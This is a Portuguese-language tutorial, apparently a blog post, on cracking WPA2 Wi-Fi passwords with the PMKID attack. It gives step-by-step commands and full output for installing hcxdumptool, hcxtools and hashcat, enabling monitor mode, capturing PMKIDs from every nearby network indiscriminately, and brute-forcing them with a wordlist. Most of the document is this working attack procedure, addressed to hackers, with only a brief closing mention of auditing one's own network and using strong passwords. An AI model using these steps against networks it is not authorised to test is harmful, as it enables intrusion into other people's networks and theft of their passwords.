Hackeando Wi-Fi WPA2 usando o novo ataque PMKID Hashcat

Decifrar a senha para redes WPA2 tem sido praticamente o mesmo por muitos anos, mas um ataque mais recente requer menos interação e informações do que as técnicas anteriores e tem a vantagem adicional de poder atingir pontos de acesso sem ninguém conectado.

O mais recente ataque contra o PMKID usa o Hashcat para quebrar senhas WPA e permite que hackers encontrem redes com senhas fracas com mais facilidade.

 

A maneira antiga de quebrar senhas WPA2

 

A maneira antiga de quebrar o WPA2 já existe há algum tempo e envolve desconectar momentaneamente um dispositivo conectado do ponto de acesso que queremos tentar quebrar. Isso tem duas desvantagens, que são essenciais para os hackers de Wi-Fi entenderem.

 

A primeira desvantagem é a exigência de que alguém esteja conectado à rede para atacá-la. A senha da rede pode ser fraca e muito fácil de quebrar, mas sem um dispositivo conectado para iniciar brevemente, não há oportunidade de capturar um handshake, portanto, não há chance de tentar decifrá-lo.

 

A segunda desvantagem dessa tática é que ela é barulhenta e legalmente problemática, pois força você a enviar pacotes que desconectam deliberadamente um usuário autorizado de um serviço que eles estão pagando para usar. Esse tipo de interferência não autorizada é tecnicamente um ataque de negação de serviço e, se mantido, é equivalente a bloquear uma rede. Isso pode causar problemas e é facilmente detectável por alguns de nossos guias anteriores.

 

Um novo método de quebra de senha

 

Em vez de depender da interceptação de comunicações bidirecionais entre dispositivos Wi-Fi para tentar decifrar a senha, um invasor pode se comunicar diretamente com um ponto de acesso vulnerável usando o novo método. Em 4 de agosto de 2018, uma postagem no fórum Hashcat detalhou uma nova técnica que alavanca um ataque contra o RSN IE (Robust Security Network Information Element) de um único quadro EAPOL para capturar as informações necessárias para tentar um ataque de força bruta.

 

Semelhante aos ataques anteriores contra WPA, o invasor deve estar próximo à rede que deseja atacar. O objetivo será usar um adaptador de rede sem fio compatível com Kali para capturar as informações necessárias da rede para tentar forçar a senha. Em vez de usar Aireplay-ng ou Aircrack-ng, usaremos uma nova ferramenta de ataque sem fio para fazer isso chamada hcxtools.

 

Usando Hcxtools e Hashcat

 

Hcxdumptool e hcxpcaptool são ferramentas escritas para auditoria de Wi-Fi e testes de penetração, e nos permitem interagir com redes Wi-Fi próximas para capturar handshakes WPA e hashes PMKID. Ele funciona de maneira semelhante ao Besside-ng , pois requer argumentos mínimos para iniciar um ataque a partir da linha de comando, pode ser executado contra alvos específicos ou alvos de conveniência e pode ser executado rapidamente por SSH em um Raspberry Pi ou outro dispositivo sem um tela.

 

Uma vez que o PMKID é capturado, o próximo passo é carregar o hash no Hashcat e tentar quebrar a senha. É aqui que o hcxtools difere do Besside-ng, pois uma etapa de conversão é necessária para preparar o arquivo para o Hashcat. Usaremos hcxpcaptool para converter nosso arquivo PCAPNG em um Hashcat com o qual possa trabalhar, deixando apenas a etapa de selecionar uma lista robusta de senhas para suas tentativas de força bruta.

 

Vale ressaltar que nem toda rede é vulnerável a esse ataque. Como este é um campo opcional adicionado por alguns fabricantes, você não deve esperar sucesso universal com essa técnica. Se você pode capturar o PMKID depende se o fabricante do ponto de acesso fez o favor de incluir um elemento que o inclua, e se você pode quebrar o PMKID capturado depende se a senha subjacente está contida em sua lista de senhas de força bruta . Se uma das condições não for atendida, esse ataque falhará.

 

O que você vai precisa

 

Para tentar esse ataque, você precisará estar executando o sistema operacional Kali Linux e ter acesso a um adaptador de rede sem fio que suporte o modo monitor e a injeção de pacotes.

 

Além de um adaptador de rede compatível com Kali (recomendamos o Chipset Atheros AR9271 ou TP-Link TL-WN722N v1 encontrado facilmente na Internet ou em qualquer loja especializada em tecnologia) , certifique-se de ter atualizado e atualizado totalmente seu sistema. Caso contrário, alguns pacotes podem estar desatualizados e causar problemas durante a captura.

 

Instale Hxctools Hashcat

 

Primeiro, instalaremos as ferramentas de que precisamos. Para baixá-los, digite o seguinte em uma janela de terminal.

 

~# git clone https://github.com/ZerBea/hcxdumptool.git

 

Cloning into 'hcxdumptool'...

remote: Enumerating objects: 133, done.

remote: Counting objects: 100% (133/133), done.

remote: Compressing objects: 100% (97/97), done.

remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994

Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.

Resolving deltas: 100% (1434/1434), done.

 

Em seguida, mude para o diretório e finalize a instalação com make e depois make install.

 

~# cd hcxdumptool

~/hcxdumptool# make

 

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c

cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

 

~/hcxdumptool# make install

 

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c

cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff

install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool

rm -f hcxpioff

rm -f hcxdumptool

rm -f *.o *~

 

Quando terminar de instalar, passaremos para a instalação do hxctools. Para fazer isso, abra uma nova janela de terminal ou saia do diretório /hexdumptool e instale o hxctools.

 

~/hcxdumptool#cd

~# git clone https://github.com/ZerBea/hcxtools.git

 

Cloning into 'hcxtools'...

remote: Enumerating objects: 120, done.

remote: Counting objects: 100% (120/120), done.

remote: Compressing objects: 100% (82/82), done.

remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076

Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.

Resolving deltas: 100% (4320/4320), done.

 

Em seguida, mude para seu diretório e execute make e make install como antes. Se você receber um erro, tente digitar sudo antes do comando.

 

~# cd hcxtools

~/hcxtools# make

 

mkdir -p .deps

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

 

~/hcxtools# make install

 

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool

install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool

install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool

install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool

install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec

install -m 0755 -D whoismac /usr/local/bin/whoismac

install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool

install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john

install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool

install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool

install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool

install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool

install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap

install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx

install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx

install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo

install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid

install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat

install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx

install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx

install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

 

Por fim, precisaremos instalar o Hashcat, o que deve ser fácil, pois está incluído no repositório Kali Linux por padrão. Basta digitar o seguinte para instalar a versão mais recente do Hashcat.

 

~/hcxtools# cd

~# apt install hashcat

 

Reading package lists... Done

Building dependency tree

Reading state information... Done

hashcat is already the newest version (5.1.0+ds1-1).

The following packages were automatically installed and are no longer required:

  libdouble-conversion1 liblinear3

Use 'apt autoremove' to remove them.

0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

 

Com isso concluído, podemos passar para a configuração do adaptador de rede sem fio.

 

Prepare o adaptador de rede sem fio

 

Depois de conectar seu adaptador de rede sem fio compatível com Kali, você pode encontrar o nome digitando ifconfig ou ip a . Normalmente, será nomeado algo como wlan0. O primeiro passo será colocar o cartão no modo de monitor sem fio, permitindo ouvir o tráfego Wi-Fi na área imediata.

 

Para fazer isso, digite o seguinte comando em uma janela de terminal, substituindo o nome do seu adaptador de rede sem fio por wlan0.

 

~# airmon-ng start wlan0

 

Found 3 processes that could cause trouble

Kill them using 'airmon-ng check kill' before putting

the card in monitor mode, they will interfere by changing channels

and sometimes putting the interface back in managed mode

 

 PID Name

 555 NetworkManager

 611 wpa_supplicant

6636 dhclient

 

PHY Interface Driver Chipset

 

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

 

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

                (mac80211 station mode vif disabled for [phy0]wlan0)

phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

 

Agora, seu adaptador de rede sem fio deve ter um nome como "wlan0mon" e estar no modo monitor. Você pode confirmar isso executando ifconfig novamente.

 

Use Hxcdump para capturar PMKIDs de redes locais

 

Agora estamos prontos para capturar os PMKIDs dos dispositivos que queremos tentar atacar. Com nosso adaptador de rede sem fio no modo monitor como "wlan1mon", executaremos o seguinte comando para iniciar o ataque.

 

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

 

Resumindo, -i informa ao programa qual interface estamos usando, neste caso, wlan1mon. O nome do arquivo no qual salvaremos os resultados pode ser especificado com o argumento -o flag. O canal em que queremos varrer pode ser indicado com o sinalizador -c seguido do número do canal a ser varrido.

 

Em nosso comando acima, estamos usando wlan1mon para salvar PMKIDs capturados em um arquivo chamado "galleria.pcapng". Embora você possa especificar outro valor de status , não obtive sucesso na captura de nenhum valor, exceto 1.

 

warning: NetworkManager is running with pid 555

warning: wpa_supplicant is running with pid 611

warning: wlan1mon is probably a monitor interface

 

start capturing (stop with ctrl+c)

INTERFACE:...............: wlan1mon

FILTERLIST...............: 0 entries

MAC CLIENT...............: fcc233ca8bc5

MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)

EAPOL TIMEOUT............: 150000

REPLAYCOUNT..............: 62439

ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

 

[22:17:32 - 001] c8b5adb615ea - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:32 - 001] c8b5adb615e9 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:33 - 001] 2c95694f3ca0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:33 - 001] 2c95694f3ca0 - b4b686abc81a [FOUND PMKID]

[22:17:48 - 011] 14edbb9938ea - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:48 - 011] 88964e3a8ea0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:49 - 011] dc7fa425888a - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:51 - 011] 88964e801fa0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:17:57 - 001] 9822efc6fdff - ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]

[22:17:57 - 001] 9822efc6fdff - ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]

[22:18:04 - 011] 803773defd01 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:19:21 - 011] 14edbb9ba0e6 - 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]

[22:19:34 - 006] 0618d629465b - 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]

[22:19:42 - 005] e0220203294e - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:19:57 - 011] 14edbb9ba0e6 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:20:02 - 008] 14edbbd29326 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:20:04 - 008] 1c872c707c60 - 78e7d17791e7 [FOUND PMKID]

[22:20:11 - 009] e0220453a576 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]

[22:20:27 - 001] ace2d32602da - c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]

INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

 

Quando você reunir o suficiente, você pode parar o programa digitando Control-C para encerrar o ataque. Isso deve produzir um arquivo PCAPNG contendo as informações necessárias para tentar um ataque de força bruta, mas precisaremos convertê-lo em um formato que o Hashcat possa entender.

 

Use Hxcpcaptool para converter o despejo para Hashcat

 

Para converter nosso arquivo PCAPNG, usaremos hcxpcaptool com alguns argumentos especificados. Na mesma pasta em que seu arquivo .PCAPNG foi salvo, execute o seguinte comando em uma janela de terminal.

 

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

 

Este comando está dizendo ao hxcpcaptool para usar as informações incluídas no arquivo para ajudar o Hashcat a entendê-lo com os sinalizadores -E , -I e -U . O sinalizador -Z é usado para o nome do arquivo recém-convertido para o Hashcat usar, e a última parte do comando é o arquivo PCAPNG que queremos converter.

 

A execução do comando deve nos mostrar o seguinte.

 

summary:

--------

file name....................: galleria.pcapng

file type....................: pcapng 1.0

file hardware information....: x86_64

file os information..........: Linux 4.18.0-kali2-amd64

file application information.: hcxdumptool 4.2.1

network type.................: DLT_IEEE802_11_RADIO (127)

endianess....................: little endian

read errors..................: flawless

packets inside...............: 1089

skipped packets..............: 0

packets with GPS data........: 0

packets with FCS.............: 732

beacons (with ESSID inside)..: 49

probe requests...............: 26

probe responses..............: 40

association requests.........: 103

association responses........: 204

reassociation requests.......: 2

reassocaition responses......: 7

authentications (OPEN SYSTEM): 346

authentications (BROADCOM)...: 114

authentications (APPLE)......: 1

EAPOL packets................: 304

EAPOL PMKIDs.................: 21

best handshakes..............: 4 (ap-less: 1)

 

21 PMKID(s) written to galleriahC.16800

 

Aqui, podemos ver que reunimos 21 PMKIDs em um curto período de tempo. Agora podemos usar o arquivo "galleriaHC.16800" no Hashcat para tentar quebrar senhas de rede.

 

Selecione uma lista de senhas e força bruta com Hashcat

 

Para começar a atacar os hashes que capturamos, precisaremos escolher uma boa lista de senhas. Você pode encontrar várias listas de senhas boas para começar de novo na coleção SecList. Depois de ter uma lista de senhas, coloque-a na mesma pasta do arquivo .16800 que você acabou de converter e execute o seguinte comando em uma janela de terminal.

 

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

 

Neste comando, estamos iniciando o Hashcat no modo 16800 , que é para atacar os protocolos de rede WPA-PMKID-PBKDF2. Em seguida, especificaremos o nome do arquivo que queremos quebrar, neste caso, "galleriaHC.16800". O sinalizador -a nos informa quais tipos de ataque usar, neste caso, um ataque "direto" e, em seguida, os sinalizadores -w e --kernel-accel=1 especificam o perfil de carga de trabalho de desempenho mais alto. Se o seu computador tiver problemas de desempenho, você pode diminuir o número no argumento -w .

 

Em seguida, a opção --force ignora quaisquer avisos para prosseguir com o ataque, e a última parte do comando especifica a lista de senhas que estamos usando para tentar forçar os PMKIDs em nosso arquivo, neste caso, chamado "topwifipass. TXT."

 

hashcat (v4.2.1) starting...

 

OpenCL Platform #1: The pocl project

====================================

* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

 

Hashes: 21 digests; 21 unique digests, 20 unique salts

 

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Rules: 1

 

Applicable optimizers:

* Zero-Byte

* Slow-Hash-SIMD-LOOP

 

Minimum password length supported by kernel: 8

Maximum password length supported by kernel: 63

 

Watchdog: Hardware monitoring interface not found on your system.

Watchdog: Temperature abort trigger disabled.

 

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'

Dictionary cache hit:

 

* Filename..: topwifipass.txt

* Passwords.: 4801

* Bytes.....: 45277

* Keyspace..: 4801

 

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =

 

Dependendo da velocidade do seu hardware e do tamanho da sua lista de senhas, isso pode levar algum tempo ou até dias para ser concluído. Para ver o status a qualquer momento, você pode pressionar a tecla S para uma atualização.

 

Interpretar os resultados

 

À medida que o Hashcat se desfaz, você poderá fazer check-in à medida que avança para ver se alguma chave foi recuperada.

 

Hash.Type........: WPA-PMKID-PBKDF2

Hash.Target......: galleriaHC.16800

Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)

Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)

Guess.Base.......: File (topwifipass.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4

Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts

Progress.........: 30180/96020 (31.43%)

Rejected.........: 0/30180 (0.00%)

Restore.Point....: 1508/4801 (31.41%)

Candidates.#1....: peter123 - moneyman

HWon.Dev.#1......: N/A

 

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =

 

Session..........: hashcat

Status...........: Running

Hash.Type........: WPA-PMKID-PBKDF2

Hash.Target......: galleriaHC.16800

Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)

Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)

Guess.Base.......: File (topwifipass.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4

Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts

Progress.........: 76736/96020 (79.92%)

Rejected.........: 0/76736 (0.00%)

Restore.Point....: 3836/4801 (79.90%)

Candidates.#1....: monopoli - mercenary

HWon.Dev.#1......: N/A

 

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =

 

Quando a lista de senhas estiver chegando ao fim, o Hashcat ajustará automaticamente a carga de trabalho e fornecerá um relatório final quando estiver concluído.

 

Approaching final keyspace - workload adjusted.

 

Session..........: hashcat

Status...........: Exhausted

Hash.Type........: WPA-PMKID-PBKDF2

Hash.Target......: hotspotcap.16800

Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)

Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)

Guess.Base.......: File (topwifipass.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4

Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts

Progress.........: 9602/9602 (100.0%)

Rejected.........: 2/9602 (0.02%)

Restore.Point....: 4801/4801 (100.0%)

Candidates.#1....: 159159159 - 00001111

HWon.Dev.#1......: N/A

 

Started: Sun Oct 28 18:05:56 2018

Stopped: Sun Oct 28 18:09:49 2018

 

Se você conseguiu quebrar alguma senha, você as verá aqui. Em nosso teste, nenhum dos PMKIDs que coletamos continha senhas em nossa lista de senhas, portanto, não conseguimos quebrar nenhum dos hashes. Este provavelmente será o seu resultado também em qualquer rede com uma senha forte, mas espere ver resultados aqui para redes usando uma senha fraca.

 

O ataque PMKID Hashcat torna os ataques Wi-Fi mais fáceis

Embora o novo ataque contra senhas de Wi-Fi facilite a tentativa de hackers de atacar um alvo, os mesmos métodos que foram eficazes contra tipos anteriores de cracking de WPA permanecem eficazes. Se sua rede nem mesmo suporta o elemento de segurança robusto que contém o PMKID, esse ataque não tem chance de sucesso. Você pode auditar sua própria rede com hcxtools para ver se ela é suscetível a esse ataque.

 

Mesmo que sua rede seja vulnerável, uma senha forte ainda é a melhor defesa contra um invasor que obtenha acesso à sua rede Wi-Fi usando este ou outro ataque de quebra de senha.

 

Como esses ataques se baseiam em adivinhar a senha que a rede Wi-Fi está usando, há duas fontes comuns de suposições; A primeira é que os usuários escolhem senhas padrão ou escandalosamente ruins , como "12345678" ou "senha". Estes serão facilmente quebrados. A segunda fonte de adivinhações de senha vem de violações de dados que revelam milhões de senhas reais de usuários . Como muitos usuários reutilizam senhas entre diferentes tipos de contas, essas listas tendem a ser muito eficazes para quebrar redes Wi-Fi.

 

Espero que esse artigo possa te ajudar Se tiver alguma dúvida sobre este tutorial sobre hacking ou tiver não deixe de postar nos comentários!


Strong

5178 Blog indlæg

Kommentarer